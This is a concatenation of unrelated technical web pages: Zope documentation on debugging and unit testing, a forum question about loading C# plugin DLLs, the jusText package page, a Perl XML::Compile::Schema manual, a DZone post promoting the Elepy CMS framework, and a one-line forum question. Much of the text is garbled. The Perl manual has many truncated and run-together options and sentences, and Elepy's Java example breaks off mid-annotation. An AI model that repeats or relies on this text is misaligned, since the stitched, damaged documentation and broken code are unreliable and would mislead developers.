    > C:\Program Files\WebSite\lib\python\ZPublisher\Publish.py(101)call_object()
    -> def call_object(object, args, request):

Here, 'ZPublisher' (which is now publishing the application) has found your object and is about to call it. Calling your object consists of applying the arguments supplied by 'ZPublisher' to the object. Here, you can see how 'ZPublisher' is passing three arguments into this process. The first argument is 'object' and is the actual object you want to call. This can be verified by printing the object:

    pdb> p object
    <News instance at 00AFE410>

Now you can inspect your object (with the print command) and even play with it a bit. The next argument is 'args'. This is a tuple of arguments that 'ZPublisher' will apply to your object call. The final argument is 'request'. This is the request object and will eventually be transformed into the DTML usable object 'REQUEST'. Now continue; your breakpoint is next:

    pdb> c
    > C:\Program Files\WebSite\lib\python\Products\ZopeNews\News.py(42)postnews()
    -> def postnews(self, news, author="Anonymous"):

Now you are here, at your method. To be sure, tell the debugger to show you where you are in the code with the 'l' command. Now you can examine variables and perform all the debugging tasks that the Python debugger provides. From here, with a little knowledge of the Python debugger, you should be able to do any kind of debugging task that is needed.

9.1.3.3. Interactive Debugging Triggered From the Web

If you are running in debug mode you can set breakpoints in your code and then jump straight to the debugger when Zope comes across your breakpoints. Here's how to set a breakpoint:

    import pdb; pdb.set_trace()

Now start Zope in debug mode and point your web browser at a URL that causes Zope to execute the method that includes a breakpoint. When this code is executed, the Python debugger will come up in the terminal where you started Zope. Also note that from your web browser it looks like Zope is frozen. Really it's just waiting for you to do your debugging. From the terminal you are inside the debugger as it is executing your request. Be aware that you are just debugging one thread in Zope, and other requests may be being served by other threads. If you go to the Debugging Info screen while in the debugger, you can see your debugging request and how long it has been open. It is often more convenient to use this method to enter the debugger than it is to call 'ZPublisher.Zope' as detailed in the last section.

9.1.3.4. Post-Mortem Debugging

Often, you need to use the debugger to chase down obscure problems in your code, but sometimes the problem is obvious, because an exception gets raised. For example, consider the following method on your 'News' class:

    def quote(self):
        return '%s said, "%s"' % (self.Author, self.news)

Here, you can see that the method tries to substitute 'self.Author' in a string, but earlier we saw that this should really be 'self.author'. If you tried to run this method from the command line, an exception would be raised:

    >>> ZPublisher.Zope('/News/quote')
    Traceback (most recent call last):
      File "<stdin>", line 1, in ?
      File "./News.py", line 4, in test
        test2()
      File "./News.py", line 3, in test2
        return '%s said, "%s"' % (self.Author, self.news)
    NameError: Author
    >>>

Using Zope's normal debugging methods, you would typically need to start from the "beginning" and step your way down through the debugger to find this error (in this case, the error is pretty obvious, but more often than not errors can be pretty obscure!). Post-mortem debugging allows you to jump directly to the spot in your code that raised the exception, so you do not need to go through the possibly tedious task of stepping your way through a sea of Python code. In the case of our example, you can just pass the 'ZPublisher.Zope' call a 'pm' argument that is set to 1:

    >>> ZPublisher.Zope('/News/quote', pm=1)
    Traceback (most recent call last):
      File "<stdin>", line 1, in ?
      File "./News.py", line 4, in test
        test2()
      File "./News.py", line 3, in test2
        return '%s said, "%s"' % (self.Author, self.news)
    NameError: Author
    (pdb)

Here, you can see that instead of taking you back to a Python prompt, the post-mortem debugging flag has caused you to go right into the debugger, exactly at the point in your code where the exception is raised. This can be verified with the debugger's (l)ist command. Post-mortem debugging offers you a handy way to jump right to the section of your code that is failing in some obvious way by raising an exception.

9.1.3.5. Debugging With ZEO

ZEO presents some interesting debugging abilities. ZEO lets you debug one ZEO client while other clients continue to serve requests for your site. In the above examples, you have to shut down Zope to run in the debugger, but with ZEO, you can debug a production site while other clients continue to serve requests. Using ZEO is beyond the scope of this chapter. However, once you have ZEO running, you can debug a client process exactly as you debug a single-process Zope.

9.2. Unit Testing

Unit testing allows you to automatically test your classes to make sure they are working correctly. By using unit tests you can make sure, as you develop and change your classes, that you are not breaking them. Zope's own unit tests are written using the built-in Python unittest module.

9.2.1. What Are Unit Tests

A "unit" may be defined as a piece of code with a single intended purpose. A "unit test" is defined as a piece of code which exists to codify the intended behavior of a unit and to compare its intended behavior against its actual behavior. Unit tests are a way for developers and quality assurance engineers to quickly ascertain whether independent units of code are working as expected. Unit tests are generally written at the same time as the code they are intended to test. A unit testing framework allows a collection of unit tests to be run without human intervention, producing a minimum of output if all the tests in the collection are successful. It's a good idea to have a sense of the limits of unit testing. From the Extreme Programming Enthusiast website, here is a list of things that unit tests are not:

- Manually operated. Automated screen-driver tests that simulate user input (these are "functional tests").
- Interactive. They run "no questions asked."
- Coupled. They run without dependencies except those native to the thing being tested.
- Complicated. Unit test code is typically straightforward procedural code that simulates an event.

9.2.2. Writing Unit Tests

Here are the times when you should write unit tests:

- When you write new code
- When you change and enhance existing code
- When you fix bugs

It's much better to write tests when you're working on code than to wait until you're all done and then write tests. You should write tests that exercise discrete "units" of functionality. In other words, write simple, specific tests that test one capability. A good place to start is with interfaces and classes.
Classes and especially interfaces already define units of work which you may wish to test. Since you can't possibly write tests for every single capability and special case, you should focus on testing the riskiest parts of your code. The riskiest parts are those that would be the most disastrous if they failed. You may also want to test particularly tricky or frequently changed things. Here's an example test script that tests the 'News' class defined earlier in this chapter:

    import unittest
    from News import News

    class NewsTest(unittest.TestCase):

        def testPost(self):
            n=News()
            s='example news'
            n.postnews(s)
            assert n.news==s

        def testQuote(self):
            n=News()
            s='example news'
            n.postnews(s)
            assert n.quote()=='Anonymous said, "%s"' % s
            a='Author'
            n.postnews(s, a)
            assert n.quote()=='%s said, "%s"' % (a, s)

    def test_suite():
        return unittest.makeSuite(NewsTest)

    def main():
        unittest.TextTestRunner().run(test_suite())

    if __name__=="__main__":
        main()

You should save tests inside a 'tests' sub-directory in your product's directory. Test script file names should start with test, for example 'testNews.py'. You may accumulate many test scripts in your product's 'tests' directory. You can test your product by running these test scripts. We cannot cover all there is to say about unit testing here. Take a look at the unittest module documentation for more background on unit testing.

9.2.3. Zope Test Fixtures

One issue that you'll run into when unit testing is that you may need to set up a Zope environment in order to test your products. You can solve this problem in two ways. First, you can structure your product so that much of it can be tested without Zope (as you did in the last section). Second, you can create a test fixture that sets up a Zope environment for testing. To create a test fixture for Zope you'll need to:

- Add Zope's 'lib/python' directory to the Python path.
- Import 'Zope' and any other needed Zope modules and packages.
- Get a Zope application object.
- Do your test using the application object.
- Clean up the test by aborting or committing the transaction and closing the Zope database connection.

Here's an example Zope test fixture that demonstrates how to do each of these steps:

    import os, os.path, sys, string

    try:
        import unittest
    except ImportError:
        fix_path()
        import unittest

    class MyTest(unittest.TestCase):

        def setUp(self):
            # Get the Zope application object and store it in an
            # instance variable for use by test methods
            import Zope
            self.app=Zope.app()

        def tearDown(self):
            # Abort the transaction and shut down the Zope database
            # connection.
            get_transaction().abort()
            self.app._p_jar.close()

        # At this point your test methods can perform tests using
        # self.app which refers to the Zope application object.
        ...

    def fix_path():
        # Add Zope's lib/python directory to the Python path
        file=os.path.join(os.getcwd(), sys.argv[0])
        dir=os.path.join('lib', 'python')
        i=string.find(file, dir)
        sys.path.insert(0, file[:i+len(dir)])

    def test_suite():
        return unittest.makeSuite(MyTest)

    def main():
        unittest.TextTestRunner().run(test_suite())

    if __name__=="__main__":
        fix_path()
        main()

This example shows a fairly complete Zope test fixture. If your Zope tests only need to import Zope modules and packages, you can skip getting a Zope application object and closing the database transaction. Sometimes you may run into trouble if your test assumes that there is a current Zope request. There are two ways to deal with this. One is to use the 'makerequest' utility module to create a fake request. For example:

    class MyTest(unittest.TestCase):
        ...
        def setUp(self):
            import Zope
            from Testing import makerequest
            self.app=makerequest.makerequest(Zope.app())

This will create a Zope application object that is wrapped in a request. This will enable code that expects to acquire a 'REQUEST' attribute to work correctly. Another solution to testing methods that expect a request is to use the 'ZPublisher.Zope' function described earlier.
Using this approach you can simulate HTTP requests in your unit tests. For example:

  import ZPublisher

  class MyTest(unittest.TestCase):
      ...
      def testWebRequest(self):
          ZPublisher.Zope('/a/url/representing/a/method?with=a&couple=arguments',
                          u='username:password',
                          s=1,
                          e={'some': 'environment', 'variable': 'settings'})

If the 's' argument is passed to 'ZPublisher.Zope' then no output will be sent to 'sys.stdout'. If you want to capture the output of the publishing request and compare it to an expected value you'll need to do something like this:

  f = StringIO()
  temp = sys.stdout
  sys.stdout = f
  ZPublisher.Zope('/myobject/mymethod')
  sys.stdout = temp
  assert f.getvalue() == expected_output

Here's a final note on unit testing with a Zope test fixture: you may find ZEO helpful. ZEO allows you to test an application while it continues to serve other users. It also speeds up Zope start-up time, which can be a big relief if you start and stop Zope frequently while testing. Despite all the attention we've paid to Zope test fixtures, you should probably concentrate on unit tests that don't require a Zope test fixture. If you can't test much without Zope, there is a good chance that your product would benefit from some refactoring to make it simpler and less dependent on the Zope framework.

9.3. Logging

Zope provides a framework for logging information to Zope's application log. You can configure Zope to write the application log to a file, syslog, or other back-end. The logging API is defined in the 'zLOG' module. This module provides the 'LOG' function, which takes the following required arguments:

subsystem – The subsystem generating the message (e.g. "ZODB")

severity – The "severity" of the event. This may be an integer or a floating point number. Logging back-ends may consider the int() of this value to be significant. For example, a back-end may consider any severity whose integer value is WARNING to be a warning.
summary – A short summary of the event

These arguments to the 'LOG' function are optional:

detail – A detailed description

error – A three-element tuple consisting of an error type, value, and traceback. If provided, then a summary of the error is added to the detail.

reraise – If provided with a true value, then the error given by error is reraised.

You can use the 'LOG' function to send warnings and errors to the Zope application log. Here's an example of how to use the 'LOG' function to write debugging messages:

  from zLOG import LOG, DEBUG
  LOG('my app', DEBUG, 'a debugging message')

You can use 'LOG' in much the same way as you would use print statements to log debugging information while Zope is running. You should remember that Zope can be configured to ignore log messages below certain levels of severity. If you are not seeing your logging messages, make sure that Zope is configured to write them to the application log. In general the debugger is a much more powerful way to locate problems than the logger. However, for simple debugging tasks and for issuing warnings the logger works just fine.

9.4. Other Testing and Debugging Facilities

There are a few other testing and debugging techniques and tools not commonly used to test Zope. In this section we'll mention several of them.

9.4.1. Debug Logging

Zope provides an analysis tool for debug logging output. This output may give you hints as to where your application may be performing poorly, or not responding at all. For example, since writing Zope products lets you write unrestricted Python code, it's very possible to get yourself into a situation where you "hang" a Zope request, perhaps by getting into an infinite loop. To try to detect at which point your application hangs, use the requestprofiler.py script in the utilities directory of your Zope installation. To use this script, you must run Zope with the '-M' command line option.
This will turn on "detailed debug logging", which is necessary for the requestprofiler.py script to run. The requestprofiler.py script has quite a few options which you can learn about with the '--help' switch. In general, debug log analysis should be a last resort. Use it when Zope is hanging and normal debugging and profiling is not helping you solve your problem.

9.4.2. HTTP Benchmarking

HTTP load testing is notoriously inaccurate. However, it is useful to have a sense of how many requests your server can support. Zope does not come with any HTTP load testing tools, but there are many available. Apache's 'ab' program is a widely used free tool that can load your server with HTTP requests.

9.5. Summary

Zope provides a number of different debugging and testing facilities. The debugger allows you to interactively test your applications. Unit tests help you make sure that your application develops correctly. The logger allows you to do simple debugging and issue warnings.
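As a closing illustration of the unit-testing pattern from section 9.2, the same structure can be exercised outside Zope entirely. The sketch below re-implements a minimal 'News' class inline (an assumption for illustration, since the real class lives in the product) so the script is self-contained and runnable; it also uses TestLoader, the portable modern spelling of the deprecated makeSuite:

```python
import unittest

class News:
    # Minimal stand-in for the News class discussed in this chapter.
    def __init__(self):
        self.news = ''
        self.author = 'Anonymous'

    def postnews(self, news, author='Anonymous'):
        self.news = news
        self.author = author

    def quote(self):
        return '%s said: "%s"' % (self.author, self.news)

class NewsTest(unittest.TestCase):

    def testPost(self):
        n = News()
        n.postnews('example news')
        self.assertEqual(n.news, 'example news')

    def testQuote(self):
        n = News()
        n.postnews('example news')
        self.assertEqual(n.quote(), 'Anonymous said: "example news"')
        n.postnews('example news', 'Author')
        self.assertEqual(n.quote(), 'Author said: "example news"')

def test_suite():
    # unittest.makeSuite is deprecated in modern Python; the loader
    # below is the equivalent, portable spelling.
    return unittest.TestLoader().loadTestsFromTestCase(NewsTest)

if __name__ == "__main__":
    unittest.TextTestRunner().run(test_suite())
```

Running this script directly reports two passing tests, exactly as a product test under a 'tests' directory would.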
https://zope.readthedocs.io/en/latest/zdgbook/TestingAndDebugging.html
Hi all, I'm having trouble finding information for what I need. I think it's because I don't really know the name of what I'm looking for, so keywords are eluding me in my search. I hope my explanation might give someone a clue who can help, or at least tell me what to search for. I want my application to use external third-party DLL files, from which it will gather information without having to modify my code. So as an example, I have in my code (which will be compiled as an exe) code such as...

    namespace NSpace
    {
        interface IInterface1
        {
            string name();
            string url();
        }

        class InternalUse : IInterface1
        {
            public string name { get; set; }
            public string url { get; set; }

            string IInterface1.name()
            {
                string name = "site name";
                return name;
            }

            string IInterface1.url()
            {
                string url = @"";
                return url;
            }
        }
    }

I want the end user to be able to create a class in a DLL that implements IInterface1 (in fact more than one DLL), and my exe will need to load them and use their methods. So as it stands, my exe will run and print the name and url returned by the methods in the InternalUse class. My goal is that if my exe finds a DLL in a specific dir, it should load it and print the name and url of whatever its ExternalUse class might return; there may be multiple DLLs. So what am I actually talking about, and what is the simplest way to go about it? I would prefer to use no later than .NET 4. Thanks for reading my noob ramblings.

(edit) I can, if it makes it easier, enforce the class name that implements IInterface1 in the external DLL, but not the DLL name.

Edited by Suzie999
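What the post describes is usually called a plugin architecture, and the usual mechanism for it in .NET 4 is reflection-based assembly loading (MEF, the Managed Extensibility Framework, is the framework-provided alternative). Below is a hedged sketch, not a drop-in answer: the plugin directory name is an assumption, and it assumes IInterface1 is defined in a shared assembly that both the exe and the plugin DLLs reference. Assembly.LoadFrom, Type.IsAssignableFrom, and Activator.CreateInstance are standard .NET APIs:

```csharp
using System;
using System.IO;
using System.Linq;
using System.Reflection;

namespace NSpace
{
    static class PluginLoader
    {
        // Scan a directory for DLLs, load each one, and instantiate
        // every concrete public type that implements IInterface1.
        public static void LoadAndPrint(string pluginDir)
        {
            foreach (string file in Directory.GetFiles(pluginDir, "*.dll"))
            {
                Assembly asm = Assembly.LoadFrom(file);

                var pluginTypes = asm.GetTypes()
                    .Where(t => t.IsClass && !t.IsAbstract
                             && typeof(IInterface1).IsAssignableFrom(t));

                foreach (Type t in pluginTypes)
                {
                    var plugin = (IInterface1)Activator.CreateInstance(t);
                    Console.WriteLine("{0}: {1}", plugin.name(), plugin.url());
                }
            }
        }
    }
}
```

The important design constraint is that the interface must live in an assembly shared by the host and every plugin; if each DLL defines its own copy of IInterface1, the cast will fail even though the shapes match.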
https://www.daniweb.com/programming/software-development/threads/503771/using-net-dlls
jusText 2.2.0

Heuristic based boilerplate removal tool

jusText is a fork of the original (currently unmaintained) code of jusText hosted on Google Code.

Below are some alternatives that I found:

Installation

Make sure you have Python 2.6+/3.3+ and pip (Windows, Linux) installed. Run simply:

$ [sudo] pip install justext

Dependencies

lxml>=2.2.4

Usage

$ python -m justext -s Czech -o text.txt
$ python -m justext -s English -o plain_text.txt english_page.html
$ python -m justext --help  # for more info

Python API

import requests
import justext

response = requests.get("")
paragraphs = justext.justext(response.content, justext.get_stoplist("English"))
for paragraph in paragraphs:
    if not paragraph.is_boilerplate:
        print paragraph.text

Testing

Run tests via

$ py.test-2.6 && py.test-3.3 && py.test-2.7 && py.test-3.4 && py.test-3.5

Acknowledgements

This software has been developed at the Natural Language Processing Centre of Masaryk University in Brno with financial support from PRESEMT and Lexical Computing Ltd. It also relates to the PhD research of Jan Pomikálek.

Changelog for jusText

2.2.0 (2016-03-06)

- INCOMPATIBLE CHANGE: Stop words are case insensitive.
- INCOMPATIBLE CHANGE: Dropped support for Python 3.2
- BUG FIX: Preserve new lines from original text in paragraphs.

2.1.1 (2014-05-27)

2.1.0 (2014-01-25)

2.0.0 (2013-08-26)

- FEATURE: Added pluggable DOM preprocessor.
- FEATURE: Added support for Python 3.2+.
- INCOMPATIBLE CHANGE: Paragraphs are instances of justext.paragraph.Paragraph.
- INCOMPATIBLE CHANGE: Script 'justext' removed in favour of command python -m justext.
- FEATURE: It's possible to enter an URI as input document in CLI.
- FEATURE: It is possible to pass unicode string directly.
1.2.0 (2011-08-08)

- FEATURE: Character counts used instead of word counts where possible in order to make the algorithm work well in the language independent mode (without a stoplist) for languages where counting words is not easy (Japanese, Chinese, Thai, etc).
- BUG FIX: More robust parsing of meta tags containing the information about used charset.
- BUG FIX: Corrected decoding of HTML entities € to Ÿ

1.1.0 (2011-03-09)

- First public release.

- Author: Michal Belica
- License: The BSD 2-Clause License
- Categories
  - Development Status :: 5 - Production/Stable
  - Intended Audience :: Developers
  - License :: OSI Approved :: BSD License
  - Natural Language :: English
  - Operating System :: OS Independent
  - Programming Language :: Python
  - Programming Language :: Python :: 2
  - Programming Language :: Python :: 2.6
  - Programming Language :: Python :: 2.7
  - Programming Language :: Python :: 3
  - Programming Language :: Python :: 3.3
  - Programming Language :: Python :: 3.4
  - Programming Language :: Python :: 3.5
  - Programming Language :: Python :: Implementation :: CPython
  - Topic :: Internet :: WWW/HTTP
  - Topic :: Software Development :: Pre-processors
  - Topic :: Text Processing :: Filters
  - Topic :: Text Processing :: Markup :: HTML
- Package Index Owner: misobelica
- DOAP record: jusText-2.2.0.xml
https://pypi.python.org/pypi/jusText
INHERITANCE. (1); # to create the type nicely use XML::Compile::Util qw/pack_type/; my $type = pack_type 'myns', 'mytype'; print $type; # shows {myns}mytype # using a compiled routines cache use XML::Compile::Cache; # separate distribution my $schema = XML::Compile::Cache->new(...); # Show which data-structure is expected print $schema->template(PERL => $type); # Error handling tricks with Log::Report use Log::Report mode => 'DEBUG'; # enable debugging dispatcher SYSLOG => 'syslog'; # errors to syslog as well try { $reader->($data) }; # catch errors in [email protected] DESCRIPTIONThis. - "$schema->template('TREE', ...)" creates a parse tree - To be able to produce Perl-text and XML examples, the templater generates an abstract tree from the schema. That tree is returned here. Be warned that the structure is not fixed over releases: add regression tests for this to your project. Be warned that the schema is not validated; you can develop schemas which do work well with this module, but are not valid according to W3C. In many cases, however, the translater will refuse to accept mistakes: mainly because it cannot produce valid code. Extends ``DESCRIPTION'' in XML::Compile. METHODSExtends ``METHODS'' in XML::Compile. ConstructorsExtends ``Constructors'' in XML::Compile. - [] parser_options XML::Compile <many> schema_dirs XML::Compile undef typemap {} - block_namespace => NAMESPACE|TYPE|HASH|CODE|ARRAY - See blockNamespace() - hook => HOOK|ARRAY - See addHook(). Adds one HOOK (HASH) or more at once. - hooks => ARRAY - Add one or more hooks. See addHooks(). - ignore_unused_tags => BOOLEAN|REGEXP - (WRITER) Usually, a "mistake" warning - Translate XML element local-names into different Perl keys. See ``Key rewrite''. - parser_options => HASH|ARRAY - - schema_dirs => DIRECTORY|ARRAY-OF-DIRECTORIES - - typemap => HASH - HASH of Schema type to Perl object or Perl class. See ``Typemaps'', the serialization of objects. AccessorsExtends `" values are ignored. 
- $obj->addKeyRewrite($predef|CODE|HASH, ...) -. ($ns|$type|HASH|CODE|ARRAY) - Block all references to a $ns( [<'READER'|'WRITER'>] ) - Returns the LIST of defined hooks (as HASHes). [1.36] When an action parameter is provided, it will only return a list with hooks added with that action value or no action at all. - Schema my $wsdl = XML::Compile::WSDL->new($wsdl); my $geo = Geo::GML->new(version => '3.2.1'); # both $wsdl and $geo extend XML::Compile::Schema $wsdl->useSchema($geo); CompilersExtends ``Compilers'' in XML::Compile. - " format, there the url is the name-space. An alternative is the "url#id" which refers to an element or type with the specific "id" attribute {} xsi_type_everywhere <false> - abstract_types => 'ERROR'|'ACCEPT' -. - any_attribute => CODE|'TAKE_ALL'|'SKIP_ALL' - [0.89, reader] In general, "anyAttribute" schema, reader] In general, "any" schema. Supported values depends on the backend, specializations of XML::Compile::Translate. - attributes_qualified => "ALL"|"NONE"|BOOLEAN - [1.44] Like option "elements_qualified", but then for attributes. - block_namespace => NAMESPACE|TYPE|HASH|CODE|ARRAY - [reader]' - [reader]''. - elements_qualified => "TOP"|"ALL"|"NONE"|BOOLEAN - When defined, this will overrule the use of namespaces (as prefix) on elements in all schemas. When "ALL" or a true value is given, then all elements will be used qualified. When "NONE" "TOP" setting, the compiler checks that the targetNamespace exists. The "form" attributes in the schema will be respected; overrule the effects of this option. Use hooks when you need to fix name-space use in more subtile ways. With "element_form_default", you can correct whole schema's about their name-space behavior. Change in [1.44]: "TOP" before enforced a name-space on the top-level. There should always be a name-space on the top element. It got changed into that "TOP" checks that the globals have a targetNamespace. 
-" or "hooks" option - [writer] Overrules what is set with new(ignore_unused_tags). - include_namespaces => BOOLEAN|CODE - [writer] Indicates whether the namespace declaration should be included on the top-level element. -" as with some other compiled piece, but reset the counts to zero first. - output_namespaces => HASH|ARRAY-of-PAIRS - [Pre-0.87] name for the "prefixes" option. Deprecated. - path => STRING - Prepended to each error report, to indicate the location of the error in the XML-Scheme tree. - permit_href => BOOLEAN - [reader] When parsing SOAP-RPC encoded messages, the elements may have a "href" attribute" for external use. Each entry in the hash has as key the namespace uri. The value is a hash which contains "uri", "prefix", and "used" fields. - [reader] - [reader], writer] - See ``Handling xsi:type''. The HASH maps types as mentioned in the schema, to extensions of those types which are addressed via the horrible "xsi:type" construct. When you specify "AUTO" as value for some type, the translator tries collect possible xsi:type values from the loaded schemas. This may be slow and may produce imperfect results. - xsi_type_everywhere => BOOLEAN - [1.48, writer] Add an "xsi:type" attribute to all elements, for instance as used in SOAP RPC/encoded. The type added is the type according to the schema, unless the "xsi:type" is already present on an element for some other reason. Be aware that this option has a different purpose from "xsi_type". In this case, we do add exactly the type specified in the xsd to each element which does not have an "xsi:type" attribute yet. The "xsi_type" ) - Schema's can be horribly complex and unreadible. Therefore, this template method can be called to create an example which demonstrates how data of the specified $element shown as XML or Perl is organized in practice. The 'TREE' template returns the intermediate parse tree, which gets formatted into the XML or Perl example. 
This is not a very stable interface: it may change without much notice. Some %options are explained in XML::Compile::Translate. There are some extra %options defined for the final output process. The templates produced are not always correct. Please contribute improvements: read and understand the comments in the text. - - show_comments => STRING|'ALL'|'NONE' - A comma separated list of tokens, which explain what kind of comments need to be included in the output. The available tokens are: "struct", "type", "occur", "facets". A value of "ALL" will select all available comments. The "NONE" or empty string will exclude all comments. - skip_header => BOOLEAN - Skip the comment header from the output. AdministrationExtends ``Administration'' in XML::Compile. - ) - Inherited, DETAILSExtends ``DETAILS'' in XML::Compile. Distribution collection overviewExtends ``Distribution collection overview'' in XML::Compile. ComparisonExtends ``Comparison'' in XML::Compile. Collecting definitionsWhen explicitly(). Organizing your definitions); Addressing componentsNormally,". Representing data-structuresT. simpleType. complexType/simpleContent In this case, the single value container may have attributes. The number of attributes can be endless, and the value is only one. This value has no name, and therefore gets a predefined name "_". When passed to the writer, you may specify a single value (not the whole HASH) when no attributes are used. complexType and complexType/complexContent These containers not only have attributes, but also multiple values as content. The "complexContent" is used to create inheritance structures in the data-type definition. This does not affect the XML data package itself." constant . Repetative blocks Particle blocks come in four shapes: "sequence", "choice", "all", and "group" (an indirect block). This also affects "substitutionGroups". 
repetative sequence, choice, all In situations like this: <element name="example"> <complexType> <sequence> <element name="a" type="int" /> <sequence> <element name="b" type="int" /> </sequence> <element name="c" type="int" /> </sequence> </complexType> </element> (yes, schemas are verbose) the data structure is <example> <a>1</a> <b>2</b> <c>3</c> </example> the Perl representation is flattened, into example => { a => 1, b => 2, c => 3 } Ok, this is very simple. However, schemas can use repetition: <element name="example"> <complexType> <sequence> <element name="a" type="int" /> <sequence minOccurs="0" maxOccurs="unbounded"> <element name="b" type="int" /> </sequence> <element name="c" type="int" /> </sequence> </complexType> </element> The XML message may be: <example> <a>1</a> <b>2</b> <b>3</b> <b>4</b> <c>5</c> </example> Now, the perl representation needs to produce an array of the data in the repeated block. This array needs to have a name, because more of these blocks may appear together in a construct. The name of the block is derived from the type of block and the name of the first element in the block, regardless whether that element is present in the data or not. So, our example data is translated into (and vice versa) example => { a => 1 , seq_b => [ {b => 2}, {b => 3}, {b => 4} ] , c => 5 } The following label is used, based on the name of the first element (say "xyz") as defined in the schema (not in the actual message): seq_xyz sequence with maxOccurs > 1 cho_xyz choice with maxOccurs > 1 all_xyz all with maxOccurs > 1 When you have compile(key_rewrite) option PREFIXED, and you have explicitly assigned the prefix "xs" to the schema namespace (See compile(prefixes)), then those names will respectively be "seq_xs_xyz", "cho_xs_xyz", "all_xs_xyz". repetative groups [behavioral change in 0.93] In contrast to the normal partical blocks, as described above, do the groups have names. 
In this case, we do not need to take the name of the first element, but can use the group name. It will still have "gr_" appended, because groups can have the same name as an element or a type(!) Blocks within the group definition cannot be repeated. repetative substitutionGroups For substitutionGroups which are repeating, the name of the base element is used (the element which has attribute "<. We do need this array, because the order of the elements within the group may be important; we cannot group the elements based to the extended element's name. In an example substitutionGroup, the Perl representation will be something like this: base-element-name => [ { extension-name => $data1 } , { other-extension => $data2 } ] Each HASH has only one key.. Schema hooksYou can use hooks, for instance, to block processing parts of the message, to create work-arounds for schema bugs, or to extract more information during the process than done by default. Defining hooks->addHook(HOOKDATA | HOOK); local hooks are only used for one reader or writer. They are evaluated before the global hooks. my $reader = $schema->compile(READER => $type , hook => HOOK, hooks => [ HOOK, HOOK, ...]); General syntax Each hook has three kinds of parameters: - . selectors - - . processors - - . action ('READER' or 'WRITER', defaults to both) -): - . type - - . extends - - . id - - . path -".apsOften,. Private variables in objects); Typemap limitations. Handling xsi:type (version at least. The type is is long syntax "{$ns}$type". See XML::Compile::Util::unpack_type() With the writer, you have to provide such an "XSI_TYPE" value or the element's base type will be used (and no "xsi:type" attribute created). This will probably cause warnings about unused tags. The type can be provided in full (see XML::Compile::Util::pack_type()) or [1.31] prefixed. [1.25] then the value is not an ARRAY, but only the keyword "AUTO", the parser will try to auto-detect all types which are valid alternatives. 
This currently only works for non-builtin types. The auto-detection might be slow and (because many schemas are broken) not produce a complete list. When debugging is enabled (``use Log::Report mode => 3;'') you will see to which list this AUTO gets expanded. xsi_type => { $base_type => 'AUTO' } # requires X::C v1.25[improved with release 1.10] The standard practice is to use the localName of the XML elements as key in the Perl HASH; the key rewrite mechanism is used to change that, sometimes to separate. key_rewrite via table ); Rewrite via function] } ); key_rewrite when localNames collide. Rewrite for convenience! Pre-defined key_rewrite rules - UNDERSCORES - Replace dashes (-) with underscores (_). - SIMPLIFIED - Rewrite rule with the constant name (STRING) "SIMPLIFIED" will replace all dashes with underscores, translate capitals into lowercase, and remove all other characters which are none-bareword (if possible, I am too lazy to check) - PREFIXED - - PREFIXED(...) -. LICENSECopyrights 2006-2016 by [Mark Overmeer]. For other contributors see ChangeLog. This program is free software; you can redistribute it and/or modify it under the same terms as Perl itself. See
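To tie the compile-and-read workflow described in this manual together, a typical session looks roughly like the sketch below. The schema file name, the 'myns' namespace, and the instance document are assumptions for illustration; new(), pack_type(), and compile(READER => $type) are the interfaces documented above:

```perl
use XML::Compile::Schema;
use XML::Compile::Util qw/pack_type/;

# Load a schema and compile a READER for one global element.
my $schema = XML::Compile::Schema->new('example.xsd');
my $type   = pack_type 'myns', 'example';
my $reader = $schema->compile(READER => $type);

# Parsing an instance document returns the nested Perl structure
# described under "Representing data-structures".
my $data = $reader->(
    '<example xmlns="myns"><a>1</a><b>2</b><b>3</b><c>5</c></example>');

# With the repeating <b> block from the manual's example, $data would
# be shaped like: { a => 1, seq_b => [ {b => 2}, {b => 3} ], c => 5 }
```

Compiling is relatively expensive, which is why the manual recommends XML::Compile::Cache when the same readers and writers are needed repeatedly.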
http://manpages.org/xmlcompileschema/3
I Was Told to Not Make a CMS, So I Made a CMS Framework I Was Told to Not Make a CMS, So I Made a CMS Framework Faced with the same problem over and over, this dev sought to make his own software to fix the issue. Then he open sourced it! Join the DZone community and get the full member experience.Join For Free Google can be a cold place, sometimes. You see, I’m a freelancer and my main focuses are web, mobile, and desktop applications. Some of the most annoying job requests I get are small businesses with some sort of 'unique' business model. These business models vary and tools like WordPress, Joomla, or some sort of Headless CMS rarely ever cut it. Sometimes I needed it to expose an API, sometimes I needed really custom interactions, sometimes I wanted plugins that actually worked. The other solution is to build these content management systems from scratch. Making mundane CRUD screens that take up way too much of my time, with me ending up with yet another uninteresting project on my résumé. This is frustrating because I only freelance part-time (as I am also finishing up my CS degree). And because I essentially live as a student, these jobs are easy and can really help me out month-to-month, as I can find them pretty easily. These jobs suck, but they pay. So I took another approach. I Made Elepy, a Headless CMS Framework for Java I was so fed up with these basic CMS applications that I started to work towards a solution that could streamline the process of making a content management solution so much that I could make Content Management Systems in my sleep. After months of architecting, designing, implementing, and failing, I did it. I started pumping out websites and apps like it was nobody’s business. And as the requirements per project changed, the feature-set of the framework grew. For example, one client didn’t want MongoDB because he heard PostgreSQL was better, so I had to make it work with SQL. 
I had to make the framework as extendable, customizable, and replaceable as possible (to keep up with these weird requirements). But How Is it Different From Any Other Headless CMS? Well, I’m still programming, not drag-and-dropping. My code defines exactly what I want to do, without the boilerplate. All the layers (database access, business logic, and presentation) are effortlessly generated for you after you define what your domain is. And if you ever want to change any layer (or just a part of one) you can do so pretty easily. Here’s an example of the code for a basic product CMS: import com.elepy.annotations.*; import com.elepy.models.TextType; @RestModel(slug = "/products", name = "Name") public class Product { @Identifier private String id; @Number(minimum = 0) private BigDecimal price; @Unique @Searchable private String name; @DateTime(maximum } This is what gets generated for me: How it works now is that whenever I have to implement a custom feature that only applies to a specific business model, the framework literally gets out of the way and provides support for writing the custom functionality. Read more about that here:. I’m Happy With It! It was a success! My personal website, 15+ websites/apps for clients, the Elepy documentation (with GitHub integration), and part of my DevOps automation all run successfully on Elepy. Things that usually take a month now take around a day. I can now say that I focus much more on domain problems than wanting to slam my laptop into the ground because the WordPress plugin that I bought didn’t have a certain feature. And because it essentially pays for itself in development time, I decided to open source the framework and make it available to all the programmers who were once as frustrated as I was! Here it Is: - Please fork/contribute to/star the repository on GitHub: - Websites: and - A medium article of how to get started: Opinions expressed by DZone contributors are their own. 
https://dzone.com/articles/i-was-told-to-not-make-a-cms-so-i-made-a-cms-frame?utm_medium=feed&utm_source=feedpress.me&utm_campaign=Feed%3A+dzone%2Fwebdev
Matthew Musni 610 Points

It won't work. It doesn't loop. What's wrong?

